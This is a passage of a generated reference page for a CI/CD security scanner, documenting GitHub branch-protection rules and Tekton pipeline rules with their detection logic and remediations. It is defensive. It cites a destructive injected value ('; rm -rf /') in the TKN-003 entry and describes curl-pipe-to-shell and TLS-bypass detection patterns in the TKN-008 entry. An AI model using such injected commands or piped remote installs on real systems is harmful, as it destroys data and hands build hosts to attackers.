How this is detected. Reads allow_deletions.enabled from the branch protection payload. Fires when the value is True. Pairs with SCM-007 (force-push allowed) — the two flags together cover the complete rewrite-history attack class.
Recommendation. In the default-branch protection rule, set Allow deletions to Disabled. A deleted default branch wipes every protection rule attached to it; an attacker with write access can delete the branch, recreate it from a tampered commit, and re-apply protection in a way that looks identical from the UI.
Source: SCM-009 in the SCM provider.
SCM-010: Branch protection allows administrators to bypass HIGH
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads enforce_admins.enabled from the branch protection payload. Fires when the value is False or the field is missing. Pairs with every other SCM-NNN rule that reads a branch-protection knob — without enforce_admins, those rules document intent rather than reality.
Recommendation. In the default-branch protection rule, enable Do not allow bypassing the above settings (a.k.a. Include administrators). Otherwise every other knob you set (required reviews, status checks, signed commits) becomes advisory rather than enforced. A compromised admin account is also a much shorter path to a tampered release than a compromised contributor account, so admins are exactly the identity the gate needs to apply to.
Source: SCM-010 in the SCM provider.
SCM-011: Default branch protection does not require CODEOWNERS reviews MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.require_code_owner_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 covers the bare review-count knob; this rule scopes specifically to whose review counts. The check evaluates only the protection-rule toggle; verifying that an actual CODEOWNERS file exists at .github/CODEOWNERS (and covers the right paths) is left to the recommendation, since the GitHub API surfaces the file's presence as a separate contents request the SCM provider does not fetch.
Recommendation. In the default-branch protection rule, enable Require review from Code Owners. Add a CODEOWNERS file at .github/CODEOWNERS (or docs/CODEOWNERS) mapping directories to the team or individual responsible. The GitHub UI auto-requests review from the matched owners on every PR that touches a covered path; combined with this branch-protection knob, the merge is blocked until they approve.
Known false positives.
- Single-team repos where every contributor is a code owner of every path don't need the routing CODEOWNERS provides — but the protection knob still helps when a new team member joins. Suppress via ignore-file when the team intentionally stays flat.
Source: SCM-011 in the SCM provider.
SCM-012: Default branch protection keeps stale reviews after a push MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.dismiss_stale_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 ensures a review is required at all; this rule ensures the approval the team relies on actually corresponds to the diff being merged.
Recommendation. In the default-branch protection rule, enable Dismiss stale pull request approvals when new commits are pushed. Approvals will be cleared every time the PR head moves; the reviewer has to re-approve the latest diff before merge, closing the time-of-check / time-of-use gap an attacker can exploit by amending the branch after approval.
Source: SCM-012 in the SCM provider.
SCM-013: Default branch protection does not require conversation resolution LOW
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_conversation_resolution.enabled from the branch protection payload. Fires when the value is False or the field is missing. Severity is LOW because the rule documents process discipline rather than a structural vulnerability — but unresolved security comments are a common upstream cause of incidents.
Recommendation. In the default-branch protection rule, enable Require conversation resolution before merging. PRs cannot land until every review comment is marked resolved. The friction is small (the PR author clicks Resolve after addressing) and the payoff is concrete: review comments can't be ignored to ship faster.
Source: SCM-013 in the SCM provider.
SCM-014: Default branch protection does not require approval of the most recent push MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.require_last_push_approval from the branch protection payload. Fires when the value is False or the field is missing. Pairs with SCM-012 (dismiss stale reviews) — both close the same approval-time-of-check / merge-time-of-use gap from different angles.
Recommendation. In the default-branch protection rule, enable Require approval of the most recent reviewable push. The reviewer and the most recent pusher must be different identities; an attacker controlling one collaborator account can no longer ship a malicious diff under another collaborator's approval.
Source: SCM-014 in the SCM provider.
SCM-015: Secret scanning push protection is not enabled HIGH
Evidences: 1.5.1 Ensure scanners are in place to identify and prevent sensitive data in code.
How this is detected. Reads security_and_analysis.secret_scanning_push_protection.status from the repo metadata payload. Fires when the value is anything other than enabled. Strongly paired with SCM-004 (secret scanning enabled): SCM-004 catches credentials after the push, SCM-015 stops them at the push. Both should be on for high-trust repos.
Recommendation. Enable secret scanning push protection under the repository's Settings -> Code security -> Push protection. Pushes containing matched credential patterns are refused by GitHub before the commit is accepted, so the credential never enters git history. Authors get an immediate remediation prompt; the bypass-with-justification flow preserves the audit trail when a legitimate test-case credential needs to land.
Known false positives.
- When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
- Push protection covers the GitHub-managed pattern set (~200 token patterns from major providers). Custom-pattern support requires GitHub Advanced Security on private repos; public repos get the GitHub-managed set free.
Source: SCM-015 in the SCM provider.
SCM-016: Private vulnerability reporting is not enabled LOW
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified.
How this is detected. Reads security_and_analysis.private_vulnerability_reporting.status from the repo metadata payload. Fires when the value is anything other than enabled. Severity is LOW because the rule documents process readiness rather than a structural vulnerability — but having no private reporting channel means the next external researcher's report is either a public issue or nothing.
Recommendation. Enable private vulnerability reporting under the repository's Settings -> Code security -> Private vulnerability reporting. Researchers get a private Security tab where they can submit details directly to maintainers; the maintainers can then triage, request a CVE, coordinate disclosure timing, and merge a fix without exposing the bug publicly until ready.
Known false positives.
- When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
- Repos that publish a SECURITY.md with an alternative out-of-band reporting channel (security@ mailbox, HackerOne / Bugcrowd program) cover the same control via a different mechanism. Suppress via ignore-file when the alternative is in place and documented.
Source: SCM-016 in the SCM provider.
SCM-017: Repository has no CODEOWNERS file MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Probes the three canonical CODEOWNERS locations via GET /repos/{owner}/{repo}/contents/<path>. Fires when none of the three returns a file response. Pairs with SCM-011 (the protection-rule toggle): SCM-011 covers intent, SCM-017 covers reality. With both in place, the path-scoped review the team relies on actually happens.
Recommendation. Add a CODEOWNERS file at .github/CODEOWNERS (the GitHub-recommended location), CODEOWNERS at the repo root, or docs/CODEOWNERS. Map directories to the team or individual responsible for them. With SCM-011's require_code_owner_reviews knob enabled, GitHub auto-requests review from the matched owners on every PR; without the file, the toggle is meaningless and any reviewer can approve any change.
Known false positives.
- Single-team repos where every contributor is a code owner of every path may legitimately skip CODEOWNERS — the file adds no routing in that case. Suppress via ignore-file when the team intentionally stays flat. The same suppression applies to SCM-011.
Source: SCM-017 in the SCM provider.
SCM-018: Required PR reviews can be bypassed by named identities MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.bypass_pull_request_allowances from the branch protection payload. Fires when any of users / teams / apps is non-empty. Surfaces the counts so the operator can locate the bypass entries in the GitHub UI without re-running the audit manually.
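The count-surfacing read described above reduces to a small sketch. Function and key names are assumptions drawn from the GitHub API shape, not the scanner's code.

```python
# Illustrative SCM-018 sketch: surface per-category bypass counts so the
# operator can locate the entries in the GitHub UI, and fire when any
# category is non-empty.
def scm_018_counts(protection: dict) -> dict:
    allow = ((protection.get("required_pull_request_reviews") or {})
             .get("bypass_pull_request_allowances") or {})
    return {k: len(allow.get(k) or []) for k in ("users", "teams", "apps")}

def scm_018_fires(protection: dict) -> bool:
    return any(scm_018_counts(protection).values())
```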
Recommendation. In the default-branch protection rule, clear Allow specified actors to bypass required pull requests (required_pull_request_reviews.bypass_pull_request_allowances in the API). Required reviews are only as strong as the bypass list. If a release-bot account needs to merge automated PRs, prefer a separate protection rule for the bot's branch namespace rather than a bypass entry on the default branch.
Seen in the wild.
- Multiple GitHub Security Lab writeups attribute post-incident review-control gaps to legacy bypass entries: a contractor onboarded years earlier is listed in the allowance, a compromise of that contractor account merges tampered code despite the team having added required reviews on the default branch.
Source: SCM-018 in the SCM provider.
SCM-019: Push restrictions allowlist names individual users LOW
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
How this is detected. Reads restrictions.users from the branch protection payload. Fires when the list is non-empty. restrictions itself being absent is the default GitHub posture (no push allowlist; review gates govern access) and passes this rule. Teams and apps in restrictions are not flagged — the rule audits the personal-account subset specifically.
Recommendation. In the default-branch protection rule, audit the Restrict who can push to matching branches allowlist (restrictions in the API). Move each individual user into a GitHub team and add the team instead, or replace with a GitHub App / bot service account when the entry is an automation. Named user entries are personal-compromise vectors that bypass every PR-review gate on the branch.
Known false positives.
- A break-glass admin account intentionally listed for incident response is a legitimate use case. Suppress via ignore-file once the account's access has been reviewed (MFA, hardware token, audit-logged use).
Source: SCM-019 in the SCM provider.
TKN-001: Tekton step image not pinned to a digest HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Applies to Task and ClusterTask kinds. The image must contain @sha256: followed by a 64-char hex digest. Any tag-only reference, including :latest, fails.
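The digest test reduces to a single pattern; this regex is an illustrative reading of the rule above and may differ from the provider's actual pattern.

```python
import re

# "@sha256:" followed by a 64-char lowercase hex digest, anchored at the
# end of the image reference. Anything tag-only fails.
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")

def tkn_001_fires(image: str) -> bool:
    return DIGEST_RE.search(image) is None
```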
Recommendation. Pin every step image to a content-addressable digest (gcr.io/tekton-releases/git-init@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the step at the next pull, with no audit trail in the Task manifest.
Source: TKN-001 in the Tekton provider.
TKN-002: Tekton step runs privileged or as root HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Detection fires on a step with securityContext.privileged: true, securityContext.runAsUser: 0, securityContext.runAsNonRoot: false, securityContext.allowPrivilegeEscalation: true, or no securityContext block at all.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every step. A privileged step shares the node's kernel namespaces; a malicious or compromised step image then has root on the build node, breaking the boundary between build and cluster.
Source: TKN-002 in the Tekton provider.
TKN-003: Tekton param interpolated unsafely in step script CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened, 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Fires on any $(params.X) or $(workspaces.X.path) token inside a script: body that isn't already wrapped in double quotes ("$(params.X)"). Doesn't fire on the env-var indirection pattern, which is safe.
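An approximation of the quoting check as a regex, for illustration; the real provider's pattern may differ. It flags a substitution token whose immediate neighbors are not double quotes.

```python
import re

# Flag $(params.X) / $(workspaces.X.path) tokens in a script body that
# are not wrapped in double quotes. Lookbehind/lookahead check the
# characters immediately around the token.
UNQUOTED = re.compile(
    r'(?<!")\$\((params\.[\w-]+|workspaces\.[\w-]+\.path)\)(?!")'
)

def tkn_003_fires(script: str) -> bool:
    return UNQUOTED.search(script) is not None
```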
Recommendation. Don't interpolate $(params.<name>) directly into the step script:. Tekton substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Receive the parameter through env: (valueFrom: ... or value: $(params.<name>)) and reference the env var quoted in the script ("$NAME"); or pass it as a positional argument to a shell function.
Source: TKN-003 in the Tekton provider.
TKN-004: Tekton Task mounts hostPath or shares host namespaces CRITICAL
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Checks spec.volumes[].hostPath (legacy v1beta1 form), spec.workspaces[].volumeClaimTemplate.spec.storageClassName == 'hostpath', and spec.podTemplate host-namespace flags.
Recommendation. Use Tekton workspaces: backed by emptyDir or persistentVolumeClaim instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true on the Task's podTemplate. A hostPath mount of /var/run/docker.sock or / lets the build break out of the pod and act as the underlying node.
Source: TKN-004 in the Tekton provider.
TKN-005: Literal secret value in Tekton step env or param default CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than a $(params.X) / valueFrom reference.
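The strong/weak split can be sketched with well-known public token formats (AWS AKIA key IDs, GitHub classic ghp_ PATs, the JWT header prefix). These regexes are illustrative stand-ins, not necessarily the provider's, and the function assumes valueFrom references are never passed in as literal values.

```python
import re

# Strong matches: the literal itself is a recognizable credential.
STRONG = [
    re.compile(r"AKIA[0-9A-Z]{16}"),        # AWS access key ID
    re.compile(r"ghp_[A-Za-z0-9]{36}"),     # GitHub classic PAT
    re.compile(r"eyJ[A-Za-z0-9_-]+\.eyJ"),  # JWT header.payload prefix
]
# Weak match: the env var *name* suggests a secret.
SECRET_NAME = re.compile(r"(_TOKEN|_KEY|PASSWORD|SECRET)$", re.IGNORECASE)

def tkn_005_fires(name: str, value: str) -> bool:
    if any(p.search(value) for p in STRONG):
        return True
    # Weak: secret-suggesting name plus a non-empty literal that is not
    # a $(params.X) reference.
    return (bool(SECRET_NAME.search(name))
            and bool(value)
            and not value.startswith("$(params."))
```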
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or params[].default. Task manifests are committed to git and cluster-readable; literal values leak through normal access paths.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-005 in the Tekton provider.
TKN-006: Tekton run lacks an explicit timeout LOW
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Applies to PipelineRun, TaskRun, and Pipeline. For Pipelines, the rule looks for spec.tasks[].timeout as evidence of intent. Task / ClusterTask themselves don't carry a timeout; the timeout lives on the concrete run.
Recommendation. Set spec.timeouts.pipeline (or spec.timeout on a TaskRun) on every PipelineRun and TaskRun. A misbehaving step otherwise pins a build pod for the cluster's default timeout (1h). For long jobs, set a generous explicit value (2h, 6h) rather than leaving it implicit.
Source: TKN-006 in the Tekton provider.
TKN-007: Tekton run uses the default ServiceAccount MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Fires when a TaskRun or PipelineRun does not set spec.serviceAccountName; an explicit serviceAccountName: default setting is treated the same as omission.
Recommendation. Set spec.serviceAccountName on every TaskRun and PipelineRun to a least-privilege ServiceAccount that carries only the secrets and RBAC the run actually needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for build pods.
Source: TKN-007 in the Tekton provider.
TKN-008: Tekton step script pipes remote install or disables TLS HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Uses the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes so detection is consistent with the GHA / GitLab / CircleCI / Cloud Build providers.
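Rough stand-ins for the two shared regexes, for illustration only; the actual cross-provider definitions may be broader.

```python
import re

# Remote script piped straight into a shell: curl/wget ... | sh/bash/zsh/dash.
CURL_PIPE_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")

# TLS verification disabled: curl -k/--insecure, or git's sslverify knob.
TLS_BYPASS_RE = re.compile(
    r"curl\s[^\n]*(-k\b|--insecure)|http\.sslverify\s+false", re.IGNORECASE
)

def tkn_008_fires(script: str) -> bool:
    return bool(CURL_PIPE_RE.search(script) or TLS_BYPASS_RE.search(script))
```

The download-then-verify pattern recommended below (fetch to a file, check a digest, then execute) matches neither regex.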
Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the step image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the step runs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-008 in the Tekton provider.
TKN-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Detection mirrors GHA-006 / BK-009 / CC-006: the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in the Task / Pipeline document. The rule only fires on artifact-producing Tasks (those that invoke docker build / docker push / buildah / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Tasks don't trip it.
Recommendation. Add a signing step to the Task: either a dedicated cosign sign step after the build, or the official cosign Tekton catalog Task referenced as a step. The Task should sign by digest (cosign sign --yes <repo>@sha256:<digest>) so a re-pushed tag can't bypass the signature.
Source: TKN-009 in the Tekton provider.
TKN-010: No SBOM generated for build artifacts MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Tasks.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > $(workspaces.output.path)/sbom.json runs in the official syft Tekton catalog Task. cyclonedx-cli and cdxgen are alternatives. Publish the SBOM as a Workspace result so downstream Tasks can consume it.
Source: TKN-010 in the Tekton provider.
TKN-011: No SLSA provenance attestation produced MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Tekton Chains is the Tekton-native answer: once enabled on the cluster, every TaskRun's outputs are signed and attested without per-Task wiring. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance, witness run). Tasks produced by tekton-chains pass on the cosign attest match.
Recommendation. After the build step, run cosign attest --predicate slsa.json --type slsaprovenance <ref> (or use the tekton-chains controller, which signs and attests every TaskRun automatically when configured). Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: TKN-011 in the Tekton provider.
TKN-012: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is? Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec, dependency-check. Walks every Task / Pipeline / *Run document; passes if any document includes a scanner reference.
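The catalog walk can be sketched as a recursive string harvest over the parsed YAML documents. Illustrative only; the token tuple here is a subset of the full catalog listed above.

```python
# Subset of the shared vuln-scan-token catalog, for illustration.
VULN_TOKENS = ("trivy", "grype", "snyk", "osv-scanner", "govulncheck")

def iter_strings(node):
    """Yield every string anywhere in a parsed YAML document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for v in node.values():
            yield from iter_strings(v)
    elif isinstance(node, list):
        for v in node:
            yield from iter_strings(v)

def tkn_012_passes(docs: list) -> bool:
    # Passes if any document anywhere references a known scanner.
    return any(tok in s.lower()
               for doc in docs
               for s in iter_strings(doc)
               for tok in VULN_TOKENS)
```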
Recommendation. Add a vulnerability scanner step. trivy fs $(workspaces.src.path) for source / filesystem; trivy image <ref> for container images. The official Tekton catalog ships trivy-scanner and grype-scanner Tasks if you'd rather reference one. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: TKN-012 in the Tekton provider.
This page is generated. Edit pipeline_check/core/standards/data/cis_supply_chain.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py cis_supply_chain.